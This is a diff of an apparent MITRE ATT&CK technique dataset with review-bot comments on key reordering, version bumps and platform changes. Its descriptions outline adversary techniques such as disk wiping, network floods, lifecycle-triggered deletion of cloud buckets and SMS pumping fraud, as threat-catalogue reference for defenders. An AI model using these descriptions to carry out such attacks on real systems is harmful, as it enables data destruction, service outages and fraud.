description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -56561,31 +57245,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
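Review bot: most of this hunk is key reordering, not change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` for T1595.001 are removed here and reappear, content unchanged, in the next hunk at a different position. The only substantive edit in this hunk is the `modified` bump from 2022-04-25 to 2024-10-15. Emitting the YAML with a stable key order (sorted, or the order upstream uses) would keep diffs like this one to the lines that actually changed.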
@@ -56594,19 +57259,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
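Review bot: the substantive changes for T1595.001 are the version bump to '1.1', the added contributor, `x_mitre_deprecated: false` and `revoked: false`, and a new data source `'Network Traffic: Network Traffic Content'` next to the existing `Network Traffic Flow`, yet `x_mitre_detection` is untouched and still describes only volume-based detection (many flows from a single source). Check upstream whether the detection text was meant to change with the added data source; if it was not, fine, but the version bump should correspond to at least that data-source addition and nothing here should be edited locally.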
@@ -56664,7 +57351,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -56685,7 +57371,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56701,8 +57387,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -56728,7 +57412,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56744,8 +57428,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -56769,7 +57451,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56791,13 +57473,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -56889,13 +57569,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56904,7 +57583,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -56921,17 +57599,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
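Review bot: four platforms are removed from T1498.001 (`Azure AD`, `Office 365`, `SaaS`, `Google Workspace`), leaving Windows, IaaS, Linux and macOS, with `x_mitre_version` bumped from 1.3 to 1.4. Any per-platform index derived from `x_mitre_platforms` will therefore drop this technique for those platforms; confirm the platform-specific index files were regenerated in the same change and that the removal reflects an upstream platform change rather than a filter applied on this side. The same four platforms disappear from T1499.003 further down in the patch.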
@@ -56956,7 +57629,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -56994,7 +57668,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57028,12 +57702,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57098,42 +57770,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
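Review bot: this hunk mixes two genuinely new sub-techniques (T1485.001 Lifecycle-Triggered Deletion and T1496.003 SMS Pumping) with a reorder of T1499.003, whose `x_mitre_platforms`, `id`, `created`, `modified` and `external_references` (Arbor, Cisco) are deleted here and restored in the following hunks; the net change for T1499.003 is the `modified` bump and the platform reduction, so a stable key order would have made this hunk read as two clean insertions. Both new entries ship with `x_mitre_detection: ''` and `atomic_tests: []`, so they are placeholders until tests are contributed. One thing to verify in the T1485.001 text: it names the permission `PutLifecycleConfiguration` and the API call `PutBucketLifecycle`; the current S3 API is `PutBucketLifecycleConfiguration` (`PutBucketLifecycle` is the older, deprecated form). If the description is verbatim upstream text, leave it as is rather than diverging; if it is curated locally, correct the API name.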
@@ -57144,13 +57901,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -57158,12 +57922,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57224,109 +58009,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
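Review bot: Nearly every line in this hunk is a key reorder of the T1565.001 object rather than a content change; the substantive edits are `modified: '2024-08-26T16:33:33.982Z'`, `x_mitre_attack_spec_version: 3.2.0`, the dropped `spec_version: '2.1'`, and the FireEye APT38 reference URL moving from content.fireeye.com to https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf. Emitting keys in a fixed order from the generator (or sorting before serialising) would make regenerated diffs show only those changes, and the `spec_version` removal deserves a line in the PR description since it is applied to every technique object in the file.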
@@ -57335,10 +58090,14 @@ impact:
